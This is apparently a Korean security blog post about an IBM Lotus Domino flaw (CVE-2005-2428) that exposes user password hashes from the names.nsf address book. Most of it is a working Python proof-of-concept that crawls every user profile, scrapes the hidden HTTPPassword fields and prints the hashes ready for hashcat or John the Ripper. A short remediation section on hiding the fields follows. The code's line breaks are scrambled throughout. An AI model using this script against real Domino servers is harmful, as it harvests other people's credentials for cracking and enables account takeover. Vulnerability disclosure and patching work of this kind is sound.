안녕하세요.^^ 더 정확하고 빠른 소식을 전달하여 드리는 Wide-Network! 입니다.
이번에 IBM 로터스 도미노에서 R8 암호 해쉬 추출 취약점이 발견되었습니다.
아마 저희 Wide-Network가 최초의 포스팅이 아닐까... 싶은데 역시 무리겠죠?^^;
CVE 코드는 CVE-2005-2428 입니다.
1.
Description
IBM Domino Databases contain a configuration issue allowing users to obtain password hashes, configuraiton information
and
more
from
the Public Address Book (i.e., names.nsf database). Password hashes are obtained
from
the hidden HTML HTTPPassword
and
dspHTTPPassword fields per user
in
the database.
2.
Proof of Concept
#!/usr/bin/env python2
import
requests, re, BeautifulSoup, sys, argparse, os
requests.packages.urllib3.disable_warnings()
parser
=
argparse.ArgumentParser(description
=
'Domino Effect - A Lotus Domino password hash tool by Jonathan Broche (@g0jhonny)'
, version
=
"1.0"
)
parser.add_argument(
'system'
,
help
=
"IP address or hostname to harvest hashes from. "
)
parser.add_argument(
'-u'
,
'--uri'
, metavar
=
'path'
, default
=
"/names.nsf"
,
help
=
"Path to the names.nsf file. [Default: /names.nsf]"
)
outgroup
=
parser.add_argument_group(title
=
"Output Options"
)
outgroup.add_argument(
'--hashcat'
, action
=
'store_true'
,
help
=
"Print results for use with hashcat."
)
outgroup.add_argument(
'--john'
, action
=
'store_true'
,
help
=
"Print results for use with John the Ripper."
)
if
len
(sys.argv)
=
=
1
:
parser.print_help()
sys.exit(
1
)
args
=
parser.parse_args()
print
"\nDomino Effect {}\n"
.
format
(parser.version)
headers
=
{
'User-Agent'
:
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3'
}
try
:
response
=
requests.get(
"https://{}{}/People?OpenView"
.
format
(args.system, args.uri), verify
=
False
, headers
=
headers, timeout
=
3
)
except
requests.exceptions.Timeout as e:
print
"[!] Timed out, try again."
sys.exit(
1
)
except
Exception as e:
print
e
soup
=
BeautifulSoup.BeautifulSoup(response.text)
links
=
[]
#grab all user profile links
for
link
in
soup.findAll(
'a'
):
if
"OpenDocument"
in
link[
'href'
]:
if
link[
'href'
]
not
in
links:
links.append(link[
'href'
])
hashes
=
{}
for
link
in
links:
#get user profile
try
:
response
=
requests.get(
"https://{}{}"
.
format
(args.system, link), verify
=
False
, headers
=
headers, timeout
=
2
)
except
requests.exceptions.Timeout as e:
pass
except
Exception as e:
print
e
if
response.text:
soup
=
BeautifulSoup.BeautifulSoup(response.text)
name
=
soup.find(
'input'
, {
'name'
:
'$dspShortName'
}).get(
'value'
).strip()
#short name
httppassword
=
soup.find(
'input'
, {
"name"
:
"HTTPPassword"
}).get(
'value'
).strip()
dsphttppassword
=
soup.find(
'input'
, {
"name"
:
"dspHTTPPassword"
}).get(
'value'
).strip()
if
httppassword
and
httppassword
not
in
hashes.keys():
hashes[httppassword]
=
name
elif
dsphttppassword
and
dsphttppassword
not
in
hashes.keys():
hashes[dsphttppassword]
=
name
if
hashes:
#output
if
args.hashcat
or
args.john:
if
args.hashcat:
for
h
in
hashes.keys():
print
h
if
args.john:
for
h, n
in
hashes.items():
print
"{}:{}"
.
format
(n,h)
else
:
for
h, n
in
hashes.items():
print
"[*] User: {} Hash: {}"
.
format
(n, h)
print
"\n{} hashes obtained\n"
.
format
(
len
(hashes))
3.
Solution
To hide the HTTP password
from
the HTML source:
1
)
Open
the $PersonalInheritableSchema subform (In the designer under Shared Code, Subforms).
2
) Find the fields: $dspHTTPPassword
and
HTTPPassword.
3
) In the field properties
for
both fields, on the hide tab under
"Hide paragram from"
check off
"Web browsers"
.
4
)
Open
the Person form (Under Forms).
5
) In the form properties, on the
2nd
tab, disable the option
"Generate HTML for all fields"
.
In addition, ensure proper firewalls are
in
place within your environment to prevent public exposure of the names.nsf database
and
other senstive files.
위가 Exploit Code 입니다.^^
연구 목적으로 사용하시기 바랍니다.
감사합니다.